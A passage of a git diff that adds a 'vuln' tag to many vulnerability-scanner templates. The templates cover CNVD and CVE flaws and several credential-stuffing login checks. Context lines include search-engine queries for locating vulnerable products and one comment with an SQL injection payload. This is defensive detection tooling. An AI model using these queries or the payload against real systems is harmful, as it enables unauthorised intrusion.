a/http/cnvd/2021/CNVD-2021-17369.yaml b/http/cnvd/2021/CNVD-2021-17369.yaml index f923dc4a439..f102fd868f9 100644 --- a/http/cnvd/2021/CNVD-2021-17369.yaml +++ b/http/cnvd/2021/CNVD-2021-17369.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: cnvd2021,cnvd,ruijie,disclosure + tags: cnvd2021,cnvd,ruijie,disclosure,vuln http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-26422.yaml b/http/cnvd/2021/CNVD-2021-26422.yaml index f01dde77b03..6c522773e46 100644 --- a/http/cnvd/2021/CNVD-2021-26422.yaml +++ b/http/cnvd/2021/CNVD-2021-26422.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-77 metadata: max-request: 1 - tags: cnvd2021,cnvd,eyoumail,rce + tags: cnvd2021,cnvd,eyoumail,rce,vuln http: - raw: diff --git a/http/cnvd/2021/CNVD-2021-28277.yaml b/http/cnvd/2021/CNVD-2021-28277.yaml index 73b63209784..793b14e03fd 100644 --- a/http/cnvd/2021/CNVD-2021-28277.yaml +++ b/http/cnvd/2021/CNVD-2021-28277.yaml @@ -18,7 +18,7 @@ info: fofa-query: app="Landray OA system" product: landray_office_automation vendor: landray - tags: cnvd,cnvd2021,landray,lfi + tags: cnvd,cnvd2021,landray,lfi,vuln http: - raw: diff --git a/http/cnvd/2021/CNVD-2021-30167.yaml b/http/cnvd/2021/CNVD-2021-30167.yaml index 4bf841361d6..45ef0e62a54 100644 --- a/http/cnvd/2021/CNVD-2021-30167.yaml +++ b/http/cnvd/2021/CNVD-2021-30167.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-77 metadata: max-request: 2 - tags: cnvd2021,cnvd,beanshell,rce,yonyou + tags: cnvd2021,cnvd,beanshell,rce,yonyou,vuln http: - raw: diff --git a/http/cnvd/2021/CNVD-2021-32799.yaml b/http/cnvd/2021/CNVD-2021-32799.yaml index 00c74b527a6..d978bd5b1d5 100644 --- a/http/cnvd/2021/CNVD-2021-32799.yaml +++ b/http/cnvd/2021/CNVD-2021-32799.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 fofa-query: app="360新天擎" - tags: cnvd2021,cnvd,360,xintianqing,sqli + tags: cnvd2021,cnvd,360,xintianqing,sqli,vuln http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-33202.yaml b/http/cnvd/2021/CNVD-2021-33202.yaml index 5a4f66c9a75..1f50b30d9ca 100755 --- a/http/cnvd/2021/CNVD-2021-33202.yaml +++ b/http/cnvd/2021/CNVD-2021-33202.yaml @@ -17,7 +17,7 @@ info: fofa-query: app="泛微-协同办公OA" product: e-cology vendor: weaver - tags: cnvd2021,cnvd,e-cology,sqli + tags: cnvd2021,cnvd,e-cology,sqli,vuln variables: num: "999999999" diff --git a/http/cnvd/2021/CNVD-2021-41972.yaml b/http/cnvd/2021/CNVD-2021-41972.yaml index a2b135c9200..3806bdb936e 100644 --- a/http/cnvd/2021/CNVD-2021-41972.yaml +++ b/http/cnvd/2021/CNVD-2021-41972.yaml @@ -14,7 +14,7 @@ info: max-request: 1 shodan-query: http.favicon.hash:-1595726841 fofa-query: body="Login @ Reporter" - tags: cnvd2021,cnvd,acenet,acereporter,lfi + tags: cnvd2021,cnvd,acenet,acereporter,lfi,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cnvd/2021/CNVD-2021-43984.yaml b/http/cnvd/2021/CNVD-2021-43984.yaml index 6ec631ed82b..cf5a1d2ee1b 100644 --- a/http/cnvd/2021/CNVD-2021-43984.yaml +++ b/http/cnvd/2021/CNVD-2021-43984.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: "迈普通信技术股份有限公司" - tags: cnvd2021,cnvd,mpsec,maipu,lfi,isg + tags: cnvd2021,cnvd,mpsec,maipu,lfi,isg,vuln http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-49104.yaml b/http/cnvd/2021/CNVD-2021-49104.yaml index 7b4a5b8b399..5e69c4c5ac8 100644 --- a/http/cnvd/2021/CNVD-2021-49104.yaml +++ b/http/cnvd/2021/CNVD-2021-49104.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-434 metadata: max-request: 2 - tags: cnvd2021,cnvd,pan,micro,fileupload,intrusive + tags: cnvd2021,cnvd,pan,micro,fileupload,intrusive,vuln variables: string: "{{randstr}}" diff --git a/http/cnvd/2021/CNVD-2021-64035.yaml b/http/cnvd/2021/CNVD-2021-64035.yaml index 7b1d0d5ec76..e06d5d3ef36 100644 --- a/http/cnvd/2021/CNVD-2021-64035.yaml +++ b/http/cnvd/2021/CNVD-2021-64035.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: icon_hash="-15980305" - tags: cnvd,cnvd2024,lfi,leadsec,vpn + tags: cnvd,cnvd2024,lfi,leadsec,vpn,vuln http: - raw: diff --git a/http/cnvd/2022/CNVD-2022-36985.yaml b/http/cnvd/2022/CNVD-2022-36985.yaml index c72aefcafd2..f01fc564e02 100644 --- a/http/cnvd/2022/CNVD-2022-36985.yaml +++ b/http/cnvd/2022/CNVD-2022-36985.yaml @@ -21,7 +21,7 @@ info: fofa-query: title="Wuzhicms" product: wuzhicms vendor: wuzhicms - tags: cnvd,cnvd2022,wuzhicms,sqli + tags: cnvd,cnvd2022,wuzhicms,sqli,vuln variables: num: "999999999" diff --git a/http/cnvd/2022/CNVD-2022-42853.yaml b/http/cnvd/2022/CNVD-2022-42853.yaml index 279472ede20..c656352b3df 100644 --- a/http/cnvd/2022/CNVD-2022-42853.yaml +++ b/http/cnvd/2022/CNVD-2022-42853.yaml @@ -21,7 +21,7 @@ info: fofa-query: "Zentao" product: zentao vendor: easycorp - tags: cnvd,cnvd2022,zentao,sqli + tags: cnvd,cnvd2022,zentao,sqli,vuln variables: num: "999999999" diff --git a/http/cnvd/2022/CNVD-2022-43245.yaml b/http/cnvd/2022/CNVD-2022-43245.yaml index ebdecaf6141..2c369784f69 100755 --- a/http/cnvd/2022/CNVD-2022-43245.yaml +++ b/http/cnvd/2022/CNVD-2022-43245.yaml @@ -14,7 +14,7 @@ info: vendor: weaver product: e-office fofa-query: app="泛微-协同办公OA" - tags: cnvd,cnvd2022,weaver,e-office,oa,lfi + tags: cnvd,cnvd2022,weaver,e-office,oa,lfi,vuln http: - raw: diff --git a/http/cnvd/2022/CNVD-2022-86535.yaml b/http/cnvd/2022/CNVD-2022-86535.yaml index bafae3b154f..d4d0d08e5b1 100644 --- a/http/cnvd/2022/CNVD-2022-86535.yaml +++ b/http/cnvd/2022/CNVD-2022-86535.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 3 - tags: cnvd,cnvd2022,thinkphp,rce + tags: cnvd,cnvd2022,thinkphp,rce,vuln http: - raw: diff --git a/http/cnvd/2023/CNVD-2023-03903.yaml b/http/cnvd/2023/CNVD-2023-03903.yaml index 4fa53595af7..fdc172658d0 100644 --- a/http/cnvd/2023/CNVD-2023-03903.yaml +++ b/http/cnvd/2023/CNVD-2023-03903.yaml @@ -15,7 +15,7 @@ info: vendor: hagzhou-kuozhi-network-technology product: edusoho fofa-query: title="Powered By EduSoho" || body="Powered by EduSoho" || (body="Powered By EduSoho" && body="var app") - tags: cnvd,cnvd2023,lfi,edushoho + tags: cnvd,cnvd2023,lfi,edushoho,vuln http: - raw: diff --git a/http/cnvd/2023/CNVD-2023-08743.yaml b/http/cnvd/2023/CNVD-2023-08743.yaml index 644bd36ad78..c81f67ad94e 100644 --- a/http/cnvd/2023/CNVD-2023-08743.yaml +++ b/http/cnvd/2023/CNVD-2023-08743.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="人力资源信息管理系统" - tags: cnvd2023,cnvd,hongjing,hcm,sqli + tags: cnvd2023,cnvd,hongjing,hcm,sqli,vuln http: - raw: diff --git a/http/cnvd/2023/CNVD-2023-12632.yaml b/http/cnvd/2023/CNVD-2023-12632.yaml index c65d49dec32..5178cf199c0 100644 --- a/http/cnvd/2023/CNVD-2023-12632.yaml +++ b/http/cnvd/2023/CNVD-2023-12632.yaml @@ -14,7 +14,7 @@ info: max-request: 1 shodan-query: 'ecology_JSessionid' fofa-query: app="泛微-协同商务系统" - tags: cnvd,cnvd2023,ecology,sqli + tags: cnvd,cnvd2023,ecology,sqli,vuln # a' union select 1,''+(SELECT md5(9999999))+' # URL encoded 3 times diff --git a/http/cnvd/2023/CNVD-2023-48562.yaml b/http/cnvd/2023/CNVD-2023-48562.yaml index 2d6c56bd2ba..d7a04eeccdb 100644 --- a/http/cnvd/2023/CNVD-2023-48562.yaml +++ b/http/cnvd/2023/CNVD-2023-48562.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 fofa-query: app="畅捷通-TPlus" - tags: cnvd,cnvd2023,chanjettplus,rce,oast + tags: cnvd,cnvd2023,chanjettplus,rce,oast,vuln http: - raw: diff --git a/http/cnvd/2023/CNVD-2023-72138.yaml b/http/cnvd/2023/CNVD-2023-72138.yaml index 67a02b63218..38b245755c9 100644 --- a/http/cnvd/2023/CNVD-2023-72138.yaml +++ b/http/cnvd/2023/CNVD-2023-72138.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true fofa-query: icon_hash="-206100324" - tags: cnvd,cnvd2023,livegbs,info-leak + tags: cnvd,cnvd2023,livegbs,info-leak,vuln variables: user: "{{to_lower(rand_base(5))}}" diff --git a/http/cnvd/2023/CNVD-2023-96945.yaml b/http/cnvd/2023/CNVD-2023-96945.yaml index 20a982b767b..e7c086fe05f 100644 --- a/http/cnvd/2023/CNVD-2023-96945.yaml +++ b/http/cnvd/2023/CNVD-2023-96945.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: "安全生产数字化管理平台" - tags: cnvd,cnvd2023,file-upload,mcvie + tags: cnvd,cnvd2023,file-upload,mcvie,vuln http: - method: GET diff --git a/http/cnvd/2023/CNVD-C-2023-76801.yaml b/http/cnvd/2023/CNVD-C-2023-76801.yaml index 9031111a495..05e4f88db09 100644 --- a/http/cnvd/2023/CNVD-C-2023-76801.yaml +++ b/http/cnvd/2023/CNVD-C-2023-76801.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 fofa-query: app="用友-NC-Cloud" - tags: cnvd,cnvd2023,yonyou,rce,intrusive + tags: cnvd,cnvd2023,yonyou,rce,intrusive,vuln variables: filename: "{{rand_base(12)}}" diff --git a/http/cnvd/2024/CNVD-2024-15077.yaml b/http/cnvd/2024/CNVD-2024-15077.yaml index 5c93b5ac4fc..0843b6e5667 100644 --- a/http/cnvd/2024/CNVD-2024-15077.yaml +++ b/http/cnvd/2024/CNVD-2024-15077.yaml @@ -17,7 +17,7 @@ info: vendor: anji-plus product: aj-report fofa-query: title="AJ-Report" - tags: cnvd,cnvd2024,aj-report,rce + tags: cnvd,cnvd2024,aj-report,rce,vuln http: - raw: diff --git a/http/cnvd/2024/CNVD-2024-33023.yaml b/http/cnvd/2024/CNVD-2024-33023.yaml index cc7ef426742..1d7678c454b 100644 --- a/http/cnvd/2024/CNVD-2024-33023.yaml +++ b/http/cnvd/2024/CNVD-2024-33023.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: title=="U8C" - tags: cnvd,cnvd2024,yonyou,u8-cloud,sqli,time-based-sqli + tags: cnvd,cnvd2024,yonyou,u8-cloud,sqli,time-based-sqli,vuln http: - raw: diff --git a/http/cnvd/2024/CNVD-2024-38747.yaml b/http/cnvd/2024/CNVD-2024-38747.yaml index 18ca7cc13ef..33f5d8787ca 100644 --- a/http/cnvd/2024/CNVD-2024-38747.yaml +++ b/http/cnvd/2024/CNVD-2024-38747.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="智能云网关注册管理平台" - tags: cnvd,cnvd2024,sqli,dahua + tags: cnvd,cnvd2024,sqli,dahua,vuln variables: num: "999999999" diff --git a/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml b/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml index d048817c617..22244df3045 100644 --- a/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml +++ b/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 2 - tags: cloud,creds-stuffing,login-check,atechmedia,codebase + tags: cloud,creds-stuffing,login-check,atechmedia,codebase,vuln self-contained: true diff --git a/http/credential-stuffing/cloud/atlassian-login-check.yaml b/http/credential-stuffing/cloud/atlassian-login-check.yaml index 485add78e87..9da82f72110 100644 --- a/http/credential-stuffing/cloud/atlassian-login-check.yaml +++ b/http/credential-stuffing/cloud/atlassian-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: cloud,creds-stuffing,login-check,atlassian + tags: cloud,creds-stuffing,login-check,atlassian,vuln self-contained: true diff --git a/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml b/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml index 7b21d9a5b69..4336649df05 100644 --- a/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml +++ b/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: cloud,creds-stuffing,login-check,avnil-pdf + tags: cloud,creds-stuffing,login-check,avnil-pdf,vuln self-contained: true diff --git a/http/credential-stuffing/cloud/chefio-login-check.yaml b/http/credential-stuffing/cloud/chefio-login-check.yaml index 47969f8d0c2..f45f64bd79d 100644 --- a/http/credential-stuffing/cloud/chefio-login-check.yaml +++ b/http/credential-stuffing/cloud/chefio-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: cloud,creds-stuffing,login-check,chefio + tags: cloud,creds-stuffing,login-check,chefio,vuln self-contained: true diff --git a/http/credential-stuffing/cloud/codepen-login-check.yaml b/http/credential-stuffing/cloud/codepen-login-check.yaml index fd2c64eaf64..61d4e8d9ea6 100644 --- a/http/credential-stuffing/cloud/codepen-login-check.yaml +++ b/http/credential-stuffing/cloud/codepen-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 2 - tags: creds-stuffing,login-check,cloud,codepen + tags: creds-stuffing,login-check,cloud,codepen,vuln self-contained: true diff --git a/http/credential-stuffing/cloud/datadog-login-check.yaml b/http/credential-stuffing/cloud/datadog-login-check.yaml index 7e71a438523..c71102f1309 100644 --- a/http/credential-stuffing/cloud/datadog-login-check.yaml +++ b/http/credential-stuffing/cloud/datadog-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 2 - tags: cloud,creds-stuffing,login-check,datadog + tags: cloud,creds-stuffing,login-check,datadog,vuln self-contained: true diff --git a/http/credential-stuffing/cloud/docker-hub-login-check.yaml b/http/credential-stuffing/cloud/docker-hub-login-check.yaml index 83369a08a2e..1872a35327c 100644 --- a/http/credential-stuffing/cloud/docker-hub-login-check.yaml +++ b/http/credential-stuffing/cloud/docker-hub-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: creds-stuffing,login-check,cloud,docker + tags: creds-stuffing,login-check,cloud,docker,vuln self-contained: true diff --git a/http/credential-stuffing/cloud/gitea-login-check.yaml b/http/credential-stuffing/cloud/gitea-login-check.yaml index 25599a7e9cd..d22181cd693 100644 --- a/http/credential-stuffing/cloud/gitea-login-check.yaml +++ b/http/credential-stuffing/cloud/gitea-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: cloud,creds-stuffing,login-check,gitea + tags: cloud,creds-stuffing,login-check,gitea,vuln self-contained: true diff --git a/http/credential-stuffing/cloud/github-login-check.yaml b/http/credential-stuffing/cloud/github-login-check.yaml index 9aac5f50fd8..97d75420253 100644 --- a/http/credential-stuffing/cloud/github-login-check.yaml +++ b/http/credential-stuffing/cloud/github-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 2 - tags: cloud,creds-stuffing,login-check,github + tags: cloud,creds-stuffing,login-check,github,vuln self-contained: true diff --git a/http/credential-stuffing/cloud/postman-login-check.yaml b/http/credential-stuffing/cloud/postman-login-check.yaml index dece896debf..db6dd557baa 100644 --- a/http/credential-stuffing/cloud/postman-login-check.yaml +++ b/http/credential-stuffing/cloud/postman-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 2 - tags: cloud,creds-stuffing,login-check,postman + tags: cloud,creds-stuffing,login-check,postman,vuln self-contained: true diff --git a/http/credential-stuffing/cloud/pulmi-login-check.yaml b/http/credential-stuffing/cloud/pulmi-login-check.yaml index 9ad1bbfd66e..57de563a060 100644 --- a/http/credential-stuffing/cloud/pulmi-login-check.yaml +++ b/http/credential-stuffing/cloud/pulmi-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: cloud,creds-stuffing,login-check,pulmi + tags: cloud,creds-stuffing,login-check,pulmi,vuln self-contained: true diff --git a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml index 0ef2c030a9d..c470af40324 100644 --- a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml +++ b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml @@ -11,7 +11,7 @@ info: max-request: 2 shodan-query: product:"GitLab Self-Managed" fofa-query: product="GitLab" - tags: creds-stuffing,login-check,self-hosted,gitlab + tags: creds-stuffing,login-check,self-hosted,gitlab,vuln variables: username: "{{username}}" password: "{{password}}" diff --git a/http/credential-stuffing/self-hosted/grafana-login-check.yaml b/http/credential-stuffing/self-hosted/grafana-login-check.yaml index 1ca90e4135c..8ed7e0c8e52 100644 --- a/http/credential-stuffing/self-hosted/grafana-login-check.yaml +++ b/http/credential-stuffing/self-hosted/grafana-login-check.yaml @@ -15,7 +15,7 @@ info: fofa-query: title="Grafana" product: grafana vendor: grafana - tags: self-hosted,creds-stuffing,login-check,grafana + tags: self-hosted,creds-stuffing,login-check,grafana,vuln variables: username: "{{username}}" password: "{{password}}" diff --git a/http/credential-stuffing/self-hosted/jira-login-check.yaml b/http/credential-stuffing/self-hosted/jira-login-check.yaml index dd634967e2a..a785b12f6c2 100644 --- a/http/credential-stuffing/self-hosted/jira-login-check.yaml +++ b/http/credential-stuffing/self-hosted/jira-login-check.yaml @@ -11,7 +11,7 @@ info: max-request: 1 shodan-query: http.component:"Atlassian Jira" fofa-query: product="JIRA" - tags: creds-stuffing,login-check,self-hosted,jira + tags: creds-stuffing,login-check,self-hosted,jira,vuln variables: username: "{{username}}" password: "{{password}}" diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 82ae34b629d..52e7835656d 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -23,7 +23,7 @@ info: vendor: microsoft product: internet_information_server shodan-query: cpe:"cpe:2.3:a:microsoft:internet_information_server" - tags: cve,cve2000,frontpage,microsoft,edb + tags: cve,cve2000,frontpage,microsoft,edb,vuln http: - raw: diff --git a/http/cves/2000/CVE-2000-0760.yaml b/http/cves/2000/CVE-2000-0760.yaml index c1998877865..fe3d5dec733 100644 --- a/http/cves/2000/CVE-2000-0760.yaml +++ b/http/cves/2000/CVE-2000-0760.yaml @@ -18,7 +18,7 @@ info: google-query: site:*/examples/jsp/snp/snoop.jsp vendor: apache product: tomcat - tags: cve,cve2000,jakarta,tomcat,exposure,info-leak + tags: cve,cve2000,jakarta,tomcat,exposure,info-leak,vuln http: - method: GET diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index 642e41a5f9d..f274f415b5d 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -33,7 +33,7 @@ info: - product:"Cisco IOS http config" && 200 - product:"cisco ios http config" - cpe:"cpe:2.3:o:cisco:ios" - tags: cve,cve2001,cisco,ios,auth-bypass,vkev + tags: cve,cve2001,cisco,ios,auth-bypass,vkev,vuln http: - method: GET diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index a4dad05e458..d581a4a3914 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -32,7 +32,7 @@ info: - cpe:"cpe:2.3:a:squirrelmail:squirrelmail" fofa-query: title="squirrelmail" google-query: intitle:"squirrelmail" - tags: cve,cve2002,edb,xss,squirrelmail,vkev + tags: cve,cve2002,edb,xss,squirrelmail,vkev,vuln http: - method: GET diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index d5b27f4404b..516f785f118 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: sgi product: propack - tags: cve,cve2004,squirrelmail,edb,xss,sgi + tags: cve,cve2004,squirrelmail,edb,xss,sgi,vuln http: - method: GET diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index 965f246ef49..e813951ee9b 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: openbb product: openbb - tags: cve,cve2004,redirect,xss,openbb + tags: cve,cve2004,redirect,xss,openbb,vuln http: - method: GET diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index b027e36b44f..9bfdf56b77c 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: ibm product: lotus_domino - tags: cve2005,cve,domino,edb,ibm + tags: cve2005,cve,domino,edb,ibm,vuln http: - method: GET diff --git a/http/cves/2005/CVE-2005-3128.yaml b/http/cves/2005/CVE-2005-3128.yaml index 97e63759668..dba89c0dcce 100644 --- a/http/cves/2005/CVE-2005-3128.yaml +++ b/http/cves/2005/CVE-2005-3128.yaml @@ -18,7 +18,7 @@ info: metadata: max-request: 1 verified: true - tags: cve,cve2005,xss,squirrelmail,plugin,edb,vkev + tags: cve,cve2005,xss,squirrelmail,plugin,edb,vkev,vuln http: - method: GET diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index fda046cb676..46624152f03 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: horde product: horde - tags: cve2005,cve,horde,unauth + tags: cve2005,cve,horde,unauth,vuln http: - method: GET diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 1ddee5b26f4..a5d98fc6d22 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -33,7 +33,7 @@ info: - html:"SAP Business Server Pages Team" - http.html:"sap business server pages team" fofa-query: body="sap business server pages team" - tags: cve,cve2005,sap,redirect,business,xss + tags: cve,cve2005,sap,redirect,business,xss,vuln http: - method: GET diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 68ca459fdd2..f660ef21b38 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: cofax product: cofax - tags: cve2005,cve,cofax,xss + tags: cve2005,cve,cofax,xss,vuln http: - method: GET diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 907c108e60f..f4a8662d6f5 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: cherokee product: cherokee_httpd - tags: cve,cve2006,cherokee,httpd,xss + tags: cve,cve2006,cherokee,httpd,xss,vuln flow: http(1) && http(2) diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 2e7b548faf3..03fbb00a00e 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -32,7 +32,7 @@ info: - cpe:"cpe:2.3:a:squirrelmail:squirrelmail" fofa-query: title="squirrelmail" google-query: intitle:"squirrelmail" - tags: cve,cve2006,lfi,squirrelmail,edb + tags: cve,cve2006,lfi,squirrelmail,edb,vuln http: - method: GET diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 5e01d6fd90a..d26e9e25406 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: rainbow_portal product: rainbow.zen - tags: cve,cve2007,jira,xss,rainbow_portal,vkev + tags: cve,cve2007,jira,xss,rainbow_portal,vkev,vuln http: - method: GET diff --git a/http/cves/2007/CVE-2007-2449.yaml b/http/cves/2007/CVE-2007-2449.yaml index 4fb4c05617c..3d396d772bb 100644 --- a/http/cves/2007/CVE-2007-2449.yaml +++ b/http/cves/2007/CVE-2007-2449.yaml @@ -19,7 +19,7 @@ info: max-request: 1 verified: true shodan-query: title:"Apache Tomcat" - tags: cve,cve2007,apache,misconfig,tomcat,xss + tags: cve,cve2007,apache,misconfig,tomcat,xss,vuln http: - method: GET diff --git a/http/cves/2007/CVE-2007-3010.yaml b/http/cves/2007/CVE-2007-3010.yaml index 34ec63bc8ed..678b12365ec 100644 --- a/http/cves/2007/CVE-2007-3010.yaml +++ b/http/cves/2007/CVE-2007-3010.yaml @@ -37,7 +37,7 @@ info: - app="alcatel_lucent-omnipcx-enterprise" - title="omnipcx for enterprise" google-query: intitle:"omnipcx for enterprise" - tags: cve,cve2007,kev,rce,alcatel,alcatel-lucent,vkev + tags: cve,cve2007,kev,rce,alcatel,alcatel-lucent,vkev,vuln http: - method: GET diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 6aa31997943..cedf6c845a6 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomla product: rsfiles - tags: cve2007,cve,lfi,edb,joomla + tags: cve2007,cve,lfi,edb,joomla,vuln http: - method: GET diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 04670d43156..a568521e6c1 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: opensymphony product: xwork - tags: cve,cve2007,apache,rce,struts,opensymphony + tags: cve,cve2007,apache,rce,struts,opensymphony,vuln http: - method: POST diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 5c0439c70da..6b6c9837f5c 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -33,7 +33,7 @@ info: - cpe:"cpe:2.3:a:phppgadmin_project:phppgadmin" fofa-query: title=phppgadmin google-query: intitle:phppgadmin - tags: cve2007,cve,xss,pgadmin,phppgadmin,edb + tags: cve2007,cve,xss,pgadmin,phppgadmin,edb,vuln http: - method: GET diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 477a38bae04..73c7e003b48 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: wordpress product: sniplets_plugin - tags: cve2008,cve,lfi,wordpress,wp-plugin,wp,sniplets,edb,wpscan + tags: cve2008,cve,lfi,wordpress,wp-plugin,wp,sniplets,edb,wpscan,vuln http: - method: GET diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index b763b0b3722..54b72c66668 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: wordpress product: "sniplets_plugin" - tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets + tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 08aa8734876..c896b2f55d8 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -37,7 +37,7 @@ info: - title="outlook" - icon_hash=1768726119 google-query: intitle:"outlook" - tags: cve2008,cve,redirect,owa,exchange,microsoft + tags: cve2008,cve,redirect,owa,exchange,microsoft,vuln http: - method: GET diff --git a/http/cves/2008/CVE-2008-2398.yaml 